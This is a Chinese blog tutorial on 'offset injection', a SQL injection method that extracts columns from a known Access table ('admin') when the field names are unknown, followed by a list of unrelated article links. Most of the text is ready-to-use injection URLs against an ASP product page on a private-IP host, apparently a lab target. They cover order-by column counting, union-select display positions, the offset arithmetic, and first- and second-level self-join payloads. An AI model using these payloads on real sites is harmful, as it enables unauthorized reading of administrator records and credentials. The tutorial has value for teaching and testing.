ACCESS数据库偏移注入
2024-08-30 00:11:14
偏移注入主要是针对知道表,但是不知道字段的ACCESS数据库。
比如我们已经知道了表名是 admin
- 判断字段数:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 22 返回正常
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 23 返回错误
字段数为 22
- 爆出显示位:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
- 判断表内存在的字段数:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin 返回同上图一样得显示位页面
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,* from admin 返回错误
说明了admin表下有16个字段。
- 偏移公式如下:
order by 出的字段数减去 * 号判断出的字段数,然而再用order by的字段数减去2倍刚才得出来的答案
1. 22-16 = 6
2. 22-(6*2) = 10
所以答案就是 10
- 注入公式如下:(爆破内容是随机的)
一级偏移注入公式:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
此时可以增加a.id或者b.id或者a.id和b.id一起加上去来改变随机爆破出来的内容比如:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)
二级偏移注入公式:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
此时可以增加a.id或者b.id或者a.id和b.id一起加上去来改变随机爆破出来的内容比如:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
注意:这里是10个字段再减去了表里的6个字段,所以二级偏移这里是select 1,2,3,4
注意:查看源代码有奇效,可能会出现惊喜
最新文章
- Word2vec 模型载入(tensorflow)
- Redis 系列 (一) StackExchange.Redis的使用
- 介绍开源的.net通信框架NetworkComms框架 源码分析(十八 ) ConnectionListenerBase
- nginx常用命令
- POJ 1287 Networking (最小生成树)
- MongoDB再实测
- UESTC_摩天轮 2015 UESTC Training for Dynamic Programming<;Problem K>;
- HDU1029时钟(排序)
- asp.net网站发布到服务器GET的技能
- 在亚马逊linux环境上装mysql+添加启动项
- CSS你所不知的伪元素的用法
- Could not initialize class utils.JdbcUtils
- 无废话-API-01
- SpringBoot取出信息
- Linux初学 - Centos7忘记root密码的解决办法
- 利用 ProtoThreads实现Arduino多线程处理(1)
- ubuntu解压和压缩文件
- 微信小程序 - 下拉菜单组件
- Log4j 把不同包的日志打印到不同位置
- 使用Spring4时, 运行时出现找不到MappingJacksonHttpMessageConverter的情况
热门文章
- vue3系列:vue3.0自定义全局弹层V3Layer|vue3.x pc桌面端弹窗组件
- JAVA编程能力提升学习图
- 2.2.2 Sqoop2 基本架构
- [开源软件] 腾讯云Linux服务器一键安装LAMP/LNMP/LANMP环境 转
- 风炫安全Web安全学习第十六节课 高权限sql注入getshell
- 在Docker下搭建MySQL双主双重集群(单机展示,与多机原理一致)
- VsCode通过SSH连接远程服务器开发
- 断言封装整合到requests封装中应用(纠错False,Result循环,tag测试)
- 一个div画同心圆
- LuoguP5488 差分与前缀和